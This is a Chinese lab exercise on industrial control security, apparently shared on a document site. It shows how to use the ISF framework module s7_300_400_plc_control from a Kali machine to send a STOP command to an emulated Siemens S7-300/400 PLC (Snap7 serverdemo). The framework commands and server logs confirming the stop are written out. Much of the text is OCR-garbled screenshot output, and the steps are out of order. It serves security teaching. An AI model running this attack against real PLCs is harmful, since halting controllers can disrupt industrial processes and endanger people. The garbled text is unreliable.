工业互联网安全测试技术：应用测试.docx

《工业互联网安全测试技术：应用测试.docx》由会员分享，可在线阅读，更多相关《工业互联网安全测试技术：应用测试.docx（12页珍藏版）》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、系统2应用测试实验文档实验原理通过ISF工控漏洞利用框架，利用s7_300_400_plc_control的漏洞，使S7-300/400PLC 启停脚本，ISFQndustrial Exploitation Framework), ISF 是一款基于 python 编写的类似 metasploit的工控漏洞利用框架，其中Exploit模块，包含了普遍性较高的工控协议的一些 漏洞利用模块。实验目的通过ISF工控漏洞利用框架，利用s7协议的漏洞，使S7-300/400PLC应用软件自动停 止。实验环境(1)攻击机:Kali Linux虚拟机(环境自带)(2)靶机：winlO (环境自带)推荐课时数

2、：2课时实验步骤步骤一：开启并配置serverdemo应用程序(1)在winlO中开启serverdemo工业软件，如下列图1所示:文件共享 查看应用程序工具 + target*: ,1isf ( 一 C F ii * ) runisf (一)isf (7)(：)P llnir.)isf (v)PJin)isf ( 71 F ntrj ) isf ( 7 ： I) run* Running module + Target is aliveSending packet to target Stop plc图13配置参数(4) 在kali linux中开始攻击后，可以在winlO主机上观察到ser

3、verdemo应用程序的服务已经关闭，如下列图14所示： Snap7 Server Demo - Windows platform 32 bit LazarusLocal AddressLog Mask db 1 DB 2 DB 310,133.148,102StopStop00000000000000evcServerStarted：$00000001evcServerStopped:$00000002vcListnrCannocStart：500000004vcClintAddd：$00000008vcClintRj:$00000010vcClientNoRoom:$00000020vcC

4、lintxcption：$00000040vcClientDisconncted:$00000080evcCliencTerminaed:$00000100evcCliencsDropped:$00000200evcReserved_0400:500000400evcReserved_0800：$00000800evcReserved_1000:$00001000evcReserved 2000:500002000evcReserved_4000$00004000evcRsrvd_8000:$00008000vcPDUincoming500010000vcDataRad:$00020000ev

5、cDataWrit-$00040000vcNgoti*tPDU$00080000evcReadSZL$00100000vcClock$00200000evcUpload$00400000evcDirectory$00800000evcSecurity-$01000000evcControl-$02000000evcReserved_04000000-$04000000evcReserved 08000000z$080000002021-12-09 2021-12-09 2021-12-09 2021-12-09 2021-12-09 2021-12-0919:55:04 19:57:39 19

6、:57:39 19:57:39 19:57:39 19:57:39Server started 10.133.148.102 10,133.148.102 10.133.148.102 10.133.148.102 10.133.148.102Client addedThe client requires a PDU size of 480 bytes Read SZL request, ID:0x0011 INDEX:0x0000 OKRead SZL request, ID:0x001c INDEX:0x0000 OKRead SZL request, ID:0x0131 INDEX:0x

7、0001 OK2021-12-0919:59:5310.133.148.102Client added2021-12-0919:59:5310.133.148.102Client disconnectedby peer2021-12-0919:59:53(10.133.148.102)Client added2021-12-0919:59:5310.133.148.102The client requiresa PDU sizeof 480 bytes2021-12-0919:59:5310.133.148.102CPU Control request:STOP OK2021-12-0919:

8、59:5310.133.148.102Client added2021-12-0919:59:5310.133.148.102Client disconnectedby peer2021-12-0921:14:2610.133.148.102Client disconnectedby peerRunning Clients : 1图14攻击成功 翻开serverdemo应用程序的界面，如下列图2所示:Snap7 Server Demo - Windows platform 32 bit LazarusLog Mask DB 1 DB 2 DB 300000000000000 ipconfigW

9、indows IP 配置以太网适配器以太网:媒体状态连接特定的DNS后缀媒体已断开连接无线局域网适配器 本地连接* 2:媒体状态连接特定的DNS后缀媒体己断开连接无线局域网适配器 本地连接* 3:媒体状态连接特定的DNS后缀媒体已断开连接以太网适配器 VMware Network Adapter Wnetl:连接特定的DNS后缀 本地链接IPv6地址. IPv4地址子网掩码默认网关fe80:el78:dddO:ea38:lc08%6192. 168. 157. 1255. 255. 255. 0以太网适配器 VMware Network Adapter VMnet8:连接特定的DNS后缀 本地

10、链接IPv6地址. IPv4地址子网掩码默认网关无线局域网适配器WLAN：连接特定的DNS后缀 本地链接IPv6地址. IPv4地址子网掩码默认网关fe80:f078:9068:2fd7:26a4%2192. 168. 17. 1255. 255. 255. 0fe80:85da:804:lf3f:b6c4%ll10.133. 148. 102255. 255. 128. 010.133. 255. 254图3查询IP地址(4)翻开serverdemo应用程序后，进行serverdemo应用程序的配置，也就是将ip地址配置为winlO的ip地址，如下列图4所示:Snap7 Server Dem

11、o - Windows platform 32 bit LazarusLog Mask db 1 DB 2 DB 3evcServerS&rtedevcServerS&rted:$00000001evcServerStopped:$00000002evcClientAdded:500000008evcClientRejected:500000010evcClientNoRoom:$00000020evcClientException:500000040vcClientDisconnctd：$00000080evcClientTerminated:$00000100evcClxentsDropp

12、ed:$00000200evcReserved_0400:$00000400evcReserved_0800:$00000800evcReserved_1000:$00001000evcReserved 2000:500002000evcListenerCannotStart : $00000004vcReserved_4000:500004000vcReserved_8000:$00008000vcPDUincoming：$00010000vcDataRead:$00020000vcDataWrite:500040000vcNegotiatePDU:$00080000vcReadSZL：$0

13、0100000vcClock：$00200000vcUpload:$00400000vcDirctory:$00800000vcSecurity:$01000000vcControl:502000000evcReserved_04000000:504000000evcReserved_08000000:$08000000Stopped Gents: 0图4配置IP地址 配置好ip地址后，那么点击start按钮，可以看到Server started结果，即服务已开启，如下列图5所示：Snap7 Server Demo - Windows platform 32 bit LazarusLog Ma

14、sk DB 1 DB 2 DB 3Log Mask DB 1 DB 2 DB 310.133.148.102vcServerStarted：$00000001vcS*rvrScopped：$00000002vcLiscenerCannocScarc：$00000004vcClxentAdded：$00000008vcClienRejeered：$00000010vcClxenNoRoom:$00000020vcClientException:$00000040vcClncDxsconncid:$00000080vcClientTerminated:$00000100vcClxencsDropp

15、ed：$00000200vcReserved_0400：$00000400vcReserved_0800：$00000800vcReserved_1000：$00001000vcReserved 2000:$00002000vcReserved_4000$00004000vcR*serv*d_8000z$00008000vcPDUincoming$00010000vcDacaReadz500020000vcDaCaWrxe-$00040000vcNegocia-cePDU-$00080000vcReadSZL-$00100000vcClock$00200000vcUpload-$0040000

16、0vcDirectory-$00800000vcSecuricy501000000vcControl-502000000vcReserved_04000000X$04000000vcReserved_08000000z$080000002021-12-09 19:55:04 Server startedRunnrig Cbents : 0图5开启server步骤二：开启并配置clientdemo应用程序(1)在winlO中开启clientdemo工业软件,如下列图6所示:I Q V I S7工模拟器一 口 X文件 S7工控模拟器 QP 搜索S7工控模拟器名称八修改日期大小1.md2020/2/

17、29 22:58MD文件1 KB卷）clientdemo.exe2014/12/23 19:162,193 KB|如 PartnerDemo.exe2014/12/23 19:24函的2,091 KB如 serverdemo.exe2014/12/23 19:241,872 KB国 snap7.dll2014/12/18 19:25应用程序扩展207 KB5个工程画后图 6 clientdemo翻开clientdemo应用程序，并配置好IP地址,IP地址即为winlO主机的地址10,133.148,102,如下列图7所示：mJ Snap7 Client Demo - Windows platf

18、orm 32 bit LazarusConnect asPG vAsync Mode Polling OEvent O CaNback- XPDU SritDate/TireMulti rtad/vrittControlSecurityDirectory Block - Up Download Block - DB Cet/FillWhich parameters should use for the connection?CatalogOrder codeINFO NOT AVAILABLEUnit InfoModule T：t6 Na=eINFONOTAVAILABLESerial nua

19、berINFONOTAVAILABLEVendor copyrightINFONOTAVAILABLEAS Na=eINFONOTAVAILABLEModule NaseINFONOTAVAILABLECossEunication Info/ PDU uze (bytt)INFONOTAVAILABLE3 active connectionsINFONOTAVAILABLE3 MFI rate .bps)INFONOTAVAILABLEMax com. bus rar ：bpiINFONOTAVAILABLEf 7SAF Tab xs used for the connection. The

20、svstea Info is not called autosati This because sose PLC (S200/U)CO dont offer图7配置IP地址(3)配置好ip地址后，点击Connect按钮，与serverdemo服务进行连接，如下列图8所示:(Snap? Client Demo - Windows platform 32 bit LazarusRack/Slot TSAPConnect as Rack SlotPG 7Rack/Slot TSAPConnect as Rack SlotPG 7Async Mode Polling OEvent O CalbackP

21、DU Size (byte) 0Whats the smart connect feature )Whkh parameters should I use for the connection?Read SZLDate TireControlSecurityData rtad ,writeMulti read rriteDirtctory Block - Up/Donload Block - DB Gt/FillCatalocOrder codeINFO NOT AVAILABLEUnit InfoModule Tvp* Xb=INFONOTAVAILABLESerial nunberINFO

22、NOTAVAILABLEVendor copyrightINFONOTAVAILABLEAS Na=eINFONOTAVAILABLEModule NaaeINFONOTAVAILABLECosecunication InfoMu PDU size (byt)INFONOTAVAILABLEMax active connectionsINFONOTAVAILABLEMax MPI rate bps)INFONOTAVAILABLEMax con bus rare bpsINFONOTAVAILABLE图9连接服务(6)连接serverdemo服务成功后，可以在serverdemo应用程序中看到

23、连接成功的结果，如下列图10所示:Snap7 Server Demo - Windows platform 32 bit LazarusStopStopvcServerStopped：500000002vcListnerCarmotStart：$00000004vcCllentAdded：$00000008vcClientRejected：$00000010vcClientNoRoom：$00000020vcClientException：$00000040vcClintDiscormctd：$00000080vcClientTnmnated：$00000100vcCliencsDxopped

24、：500000200vcReserved_0400：$00000400vcReserved_0800：$00000800vcResexved_1000：$00001000vcReserved 2000:$00002000:$00000001vcSrvrScartedMask ；FFFFFFFFvcRsrved_4000：$00004000vcReserved_8000：$00008000vcPDUincoming：500010000vcDataRead：$00020000vcDataWrite：$00040000vcNegotiatePDU：$00080000vcReadSZL：$001000

25、00vcClock:$00200000vcUpload：$00400000vcDirectory：$00800000vcSecurity：$01000000vcControl：$02000000vcaeserved_04000000：$04000000vceserved 08000000:5080000002021-12-092021-12-092021-12-092021-12-092021-12-092021-12-0919:55:04 19:57:39 19:57:39 19:57:39 19:57:39 19:57:39Server started 10.133.148.102 10.

26、133.148.102 10.133.148.102 10.133.148.102 10.133.148.102Client addedThe client requires a PDU size of 480 bytes Read S2L request, ID:0x0011 INDEX:0x0000 OKRead SZL request, ID:0x001c INDEX:0x0000 OK Read SZL request, ID:0x0131 INDEX:0x0001 OKRunningOients: 110,133.148,102Local AddressLog MaskDB 1D62

27、D63图10连接成功界面步骤三：使用ISF框架利用漏洞使serverdem。应用程序服务暂停(1) 在 github 中 s:/github /dark-lbp/isf 链接下,下载 ISF 框架,然后进入 isf-master目录下，然后输入如下命令：python2.7 isf.py得到结果如下列图11所示:,-| /桌面 /isf-masterpython2.7 isf,ovICS Exploitation FrameworkNote : ICSSPOLIT is fork from routersploit athub /reverse-shell/routersploitDev Tea

28、m : wenzhe zhu(dark-lbp)Exploits: 8 Scanners: 6 Creds: 14ICS Exploits: PLC： 7ICS Switch: 0Software: 0图11开启isf使用ISF框架中的s7_300_400_plc_control,然后输入如下命令:use exploits/plcs/siemens/s7_300_400_plc_controlshow options得到结果如下列图12所示：isf show optionsYou have to activate any module with * use * command. isf use

29、 exploits/plcs/siemens/s7_300_400_plc_control isf ( ) show optionsTarget options:Name Current settingsDescriptiontargetport102targetport102Target PortModule options:NameCurrent settingsDescriptionslot commandCPU slot number.Command l:start plc, 2:stop plc.图 12 show options(2) 设置需要攻击的对象，即攻击的IP地址，然后输入run命令，进行攻击，输入如下